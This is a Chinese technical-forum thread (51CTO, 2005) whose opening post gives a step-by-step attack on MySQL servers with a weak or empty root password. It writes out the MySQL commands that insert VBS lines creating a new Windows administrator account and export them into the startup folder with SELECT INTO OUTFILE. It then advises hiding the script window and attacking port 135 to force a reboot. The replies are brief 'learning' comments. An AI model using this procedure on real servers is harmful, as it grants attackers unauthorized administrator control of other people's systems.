文本版|topic 高级搜索
   名人堂 帮助 论坛制度 意见反馈 | 首页 博客 周新贴 招聘 专题 新闻
RSS 底部
 
社区导航: 专家门诊   网络技术   操作系统   数据库   程序设计   系统应用   考试认证   CIO及信息化   站长交流   综合交流   下载基地  51CTO产品服务 设为首页 | 收藏本站
51CTO技术论坛» 技术白皮书 » My SQL » 攻击MYSQL用户root弱口令       [ 打印]  [ 订阅]  [ 收藏]  [ 推荐给朋友]   [ 本帖文本页]

论坛跳转:
     
标题: 攻击MYSQL用户root弱口令  ( 查看:3455  回复:9 )   
 
沧海笑一声
助理工程师  点击可查看详细


帖子 288
精华 23
无忧币 3316
积分 1898
阅读权限 40
注册日期 2005-9-1
最后登录 2005-11-7 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2005-11-4 17:59   标题:攻击MYSQL用户root弱口令
上一帖 |
MYSQL用户root密码为弱口令又一攻击方法


测试MySQL服务器root密码的方法公布如下:
1、连接到对方MYSQL 服务器
mysql -u root -h 192.168.0.1
mysql.exe 这个程序在你安装了MYSQL的的BIN目录中
2、让我们来看看服务器中有些什么数据库
mysql>show databases;
MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。
3、让我们进入数据库
mysql>use test;
我们将会进入test数据库中
4、查看我们进入数据库中有些什么数据表
mysql>show tables;
默认的情况下,test中没有任何表的存在。
以下为关键的部分
5、在TEST数据库下创建一个新的表;
mysql>create table a (cmd text);
好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
6、在表中插入内容
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );
注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!
7、好了,现在我们来看看表a中有些什么
mysql>select * from a;
我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步
8、输出表为一个VBS的脚本文件
mysql>select * from a into outfile "c:\docume~1\alluse~1\「开始」菜单\程序\启动\a.vbs";
我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意“"符号。
9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。
2005-11-4 17:591楼
[ 顶部 ]
 
ugvsyss
新新人类  点击可查看详细



帖子 67
精华 0
无忧币 200
积分 96
阅读权限 20
注册日期 2006-2-14
最后登录 2008-2-24 离线

[查看资料]  [发短消息]  [Blog
[个人主页]         
发表于:2006-2-14 20:53 
还可以
2006-2-14 20:532楼
[ 顶部 ]
 
hlyg
新新人类  点击可查看详细



帖子 36
精华 0
无忧币 54
积分 44
阅读权限 20
注册日期 2006-3-13
最后登录 2008-1-8 离线

[查看资料]  [发短消息]  [Blog
[个人主页]         
发表于:2006-3-14 15:01 
学习中
2006-3-14 15:013楼
[ 顶部 ]
 
sasa919
技术员  点击可查看详细



帖子 30
精华 0
无忧币 548
积分 226
阅读权限 30
注册日期 2006-4-8
最后登录 2006-4-18 离线

[查看资料]  [发短消息]  [Blog
[个人主页]         
发表于:2006-4-8 20:07 
学习 学习
2006-4-8 20:074楼
[ 顶部 ]
 
maozw
新新人类  点击可查看详细


诚信兄弟  
帖子 78
精华 0
无忧币 57
积分 75
阅读权限 20
注册日期 2006-5-5
最后登录 2007-12-13 离线

[查看资料]  [发短消息]  [Blog
[个人主页]         
发表于:2006-7-23 16:23 
有一点点明白...~
2006-7-23 16:235楼
[ 顶部 ]
 
wzcc
新新人类  点击可查看详细



帖子 4
精华 0
无忧币 5
积分 3
阅读权限 20
注册日期 2007-12-13
最后登录 2008-7-16 离线

[查看资料]  [发短消息]  [Blog
[个人主页]    QQ       
发表于:2007-12-13 15:15 
白了,进库——->建表-——>写字段------>字段内写脚本------->导出----->获得目标!



网络工程师到底该不该去考CCIE认证?
2007-12-13 15:156楼
[ 顶部 ]
 
dlbdy
新新人类  点击可查看详细



帖子 2
精华 0
无忧币 12
积分 2
阅读权限 20
注册日期 2008-4-21
最后登录 2008-4-28 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-4-21 14:46 
不太懂



网络工程师到底该不该去考CCIE认证?
2008-4-21 14:467楼
[ 顶部 ]
 
hate
新新人类  点击可查看详细



帖子 3
精华 0
无忧币 7
积分 3
阅读权限 20
注册日期 2008-4-26
最后登录 2008-7-3 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-4-30 10:29 
呵呵
学习学习



网络工程师到底该不该去考CCIE认证?
2008-4-30 10:298楼
[ 顶部 ]
 
studio7433
新新人类  点击可查看详细



帖子 13
精华 0
无忧币 6
积分 3
阅读权限 20
注册日期 2007-4-3
最后登录 2008-7-14 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-7-14 20:43   标题:呵呵

呵呵
学习学



网络工程师到底该不该去考CCIE认证?
2008-7-14 20:439楼
[ 顶部 ]
 
xdlowen
新新人类  点击可查看详细



帖子 1
精华 0
无忧币 10
积分 0
阅读权限 20
注册日期 2008-7-24
最后登录 2008-7-24 在线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-7-24 11:26 
学习学习



网络工程师到底该不该去考CCIE认证?
2008-7-24 11:2610楼
[ 顶部 ]
     
论坛跳转:  

| | |

| | |

| | |

标记已读 · 删除论坛Cookies · 文本版 · WAP
 
| 诚征版主 | 版主堂 | 意见建议 | 大史记 | 论坛地图
Copyright©2005-2008 51CTO.COM  Powered by Discuz!
本论坛言论纯属发布者个人意见,不代表51CTO网站立场!如有疑义,请与管理员联系。
京ICP备05051492号